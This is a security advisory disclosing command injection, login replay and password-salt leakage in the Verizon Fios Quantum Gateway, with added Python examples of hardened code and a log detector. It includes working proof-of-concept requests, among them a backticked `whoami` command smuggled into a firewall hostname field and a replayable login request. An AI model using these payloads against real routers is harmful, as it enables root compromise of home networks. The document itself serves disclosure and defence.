Synopsis
Tenable has discovered multiple vulnerabilities in the Verizon Fios Quantum Gateway.
CVE-2019-3914: Authenticated Command Injection
A command injection vulnerability was discovered in the API backend. This vulnerability can be exploited remotely to achieve command execution with root privileges. An attacker must be authenticated to the device's administrative web application in order to perform the command injection.
This issue exists due to the way firewall access control rules are processed. Specifically, the vulnerability can be triggered by adding an access control rule for a network object with a crafted host name.
For example, if a network object is added with a hostname of "`whoami`" (note the backticks), and this object is used in a firewall access control rule, the 'whoami' command will be executed.
Below is a log entry in /chroot/mnt/log/user. Notice that `whoami` is incorporated into the iptables command.
user.err11> bhr4: Firewall.AccessControlRulesLog: Failed to delete rules: iptables -A AC_B_1_NWOBJ_1 -s `whoami` -j AC_B_1_SERVICES
Below is a proof-of-concept HTTP request. Note that the output of the command is not returned in the response; nonetheless, it is possible to obtain a root shell.
POST /api/firewall/accesscontrol HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.11.1
X-XSRF-TOKEN: 1eaa16ee9264d388574253cfd0a2357e8c47718f9b4b8ac43b93c1571e0cdcda8ad3ad368389254bf4851ed68b3cc264a03003b477f59f33dc35c725fd0f6c89
Cookie: Session=944817705; XSRF-TOKEN=1eaa16ee9264d388574253cfd0a2357e8c47718f9b4b8ac43b93c1571e0cdcda8ad3ad368389254bf4851ed68b3cc264a03003b477f59f33dc35c725fd0f6c89
Content-Length: 373
Content-Type: application/json
{"blockRule": true, "schedule": "", "networkObjects": [{"rules": [{"hostname": "`whoami`", "networkObjType": 4}], "type": 3, "name": "Scooby"}], "enabled": true, "hosts": [], "schedule1": {}, "services": []}
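As an added example (not Tenable's or the vendor's code), the following contrasts the flawed pattern the advisory describes (splicing a network object's host name into an iptables shell command) with a hardened variant that validates the value against RFC 1123 and passes it as an argv element, plus a helper that flags the same defect in the Firewall.AccessControlRulesLog line quoted above. The regexes, function names and sample log line are assumptions for this demonstration.

```python
import re

# RFC 1123 host name: dot-separated labels of letters, digits and hyphens,
# no leading/trailing hyphen, at most 63 chars per label and 253 overall.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
# iptables -s also legitimately takes an IPv4 address or CIDR block.
CIDR_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?:/\d{1,2})?$")

# Log entry from /chroot/mnt/log/user as quoted in the advisory (sample input).
SAMPLE_LOG = ("user.err11> bhr4: Firewall.AccessControlRulesLog: Failed to delete "
              "rules: iptables -A AC_B_1_NWOBJ_1 -s `whoami` -j AC_B_1_SERVICES")


def vulnerable_iptables_command(chain, hostname, target):
    """The flawed pattern: the host name is spliced into a shell command
    string, so the shell evaluates backticks, ';', '|' and similar."""
    return f"iptables -A {chain} -s {hostname} -j {target}"


def is_valid_hostname(hostname):
    """Allow-list check; anything a shell could interpret fails the match."""
    return bool(HOSTNAME_RE.match(hostname))


def safe_iptables_argv(chain, hostname, target):
    """Hardened pattern: validate first, then build an argv list for
    subprocess.run(argv, shell=False) so no shell ever parses the value."""
    if not is_valid_hostname(hostname):
        raise ValueError(f"rejected host name: {hostname!r}")
    return ["iptables", "-A", chain, "-s", hostname, "-j", target]


def suspicious_source_in_log(line):
    """Detection helper: pull the '-s' operand out of a logged iptables
    command and report whether it is neither a host name nor an address."""
    m = re.search(r"\biptables\b.*?\s-s\s+(\S+)", line)
    if not m:
        return False
    value = m.group(1)
    return not (is_valid_hostname(value) or CIDR_RE.match(value))
```

The hardened builder rejects the advisory's "`whoami`" object name before it reaches iptables, and the log helper flags the quoted log entry while leaving ordinary address-based rules alone.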
CVE-2019-3915: Login Replay
The login process is susceptible to replay. Given that HTTPS is not enforced, an attacker could intercept a login request and subsequently replay it to gain access to the router's administrative web interface.
When a user attempts to log in, a salted SHA-512 password hash is POSTed. This hash is all the attacker needs to log in. For instance, a login request looks like this:
POST /api/login HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/
Content-Type: application/json;charset=utf-8
Content-Length: 143
Connection: close
Cookie: test
{"password":"5e619e19824b1072f89ff309e3896b1b6dd31aebfab1698b2662d97352d9da9fbdbf7c165239a2214bdf9ae512821e78875a1b515bd4140ec919dda201f1001e"}
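As an added example (not from the advisory or the device firmware), this models why the login above is replayable and what a replay-resistant variant looks like: the vulnerable flow accepts the static salted hash as the credential, while the hardened flow issues a single-use nonce and accepts an HMAC over it instead. The salt is the value shown later in this advisory; the password, the SHA-512(salt + password) layout and the class and function names are assumptions for the demonstration.

```python
import hashlib
import hmac
import secrets

# Constructed credential material for the demo; SHA-512(salt + password)
# is an assumed layout, the advisory only says "salted SHA-512".
PASSWORD_SALT = "6299bfce-1d56-4a6c-9bd8-352dc9ce865c"   # salt shown in the advisory
STORED_HASH = hashlib.sha512((PASSWORD_SALT + "correct-horse").encode()).hexdigest()


class ReplayableLogin:
    """Vulnerable flow: the static hash is the credential, so a captured
    POST /api/login body is accepted every time it is re-sent."""

    def login(self, posted_hash):
        return hmac.compare_digest(posted_hash, STORED_HASH)


class NonceLogin:
    """Hardened flow: the server hands out a single-use nonce and the client
    proves it holds the hash with HMAC(hash, nonce). The hash itself never
    crosses the wire, and each nonce is burned on first use."""

    def __init__(self):
        self._issued = set()

    def challenge(self):
        nonce = secrets.token_hex(16)
        self._issued.add(nonce)
        return nonce

    @staticmethod
    def proof(password_hash, nonce):
        return hmac.new(password_hash.encode(), nonce.encode(), "sha512").hexdigest()

    def login(self, nonce, proof):
        if nonce not in self._issued:          # unknown or already consumed
            return False
        self._issued.discard(nonce)
        return hmac.compare_digest(proof, self.proof(STORED_HASH, nonce))


def replay_outcomes():
    """Capture one login against each flow and re-send it.
    Returns (vulnerable replay accepted, hardened first login, hardened replay accepted)."""
    v = ReplayableLogin()
    captured_body = STORED_HASH                  # what a sniffer sees on plain HTTP
    vulnerable_replay = v.login(captured_body) and v.login(captured_body)

    h = NonceLogin()
    nonce = h.challenge()
    captured_proof = NonceLogin.proof(STORED_HASH, nonce)
    first = h.login(nonce, captured_proof)
    hardened_replay = h.login(nonce, captured_proof)
    return vulnerable_replay, first, hardened_replay
```

The nonce scheme stops replay of a captured request; it does not stop offline guessing of a weak password when the salt is known, so enforcing HTTPS is still required.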
CVE-2019-3916: Password Salt Information Disclosure
An unauthenticated attacker is able to retrieve the value of the password salt by simply visiting a URL in a web browser. Given that the firmware does not enforce the use of HTTPS, it is feasible for an attacker to capture (sniff) a login request. The login request contains a salted password hash (SHA-512), so the attacker could then perform an offline dictionary attack to recover the original password.
A proof of concept is below showing an HTTP request/response pair. Notice that the 'passwordSalt' is returned.
GET /api HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: test; bhr4UI2HasToRefresh=false; bhr4HasEnteredAdvanced=true; Session=; XSRF-TOKEN=
HTTP/1.1 401 Unauthorized
Cache-Control: no-cache
Content-Type: application/json; charset=utf-8
Content-Length: 173
Date: Thu, 06 Dec 2018 13:00:40 GMT
Server: lighttpd/1.4.38
{"doSetupWizard":false,"requirePassword":true,"passwordSalt":"6299bfce-1d56-4a6c-9bd8-352dc9ce865c","isWireless":false,"error":1,"maxUsers":10,"denyState":0,"denyTimeout":0}
Solution
Upgrade to firmware version 02.02.00.13.
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected].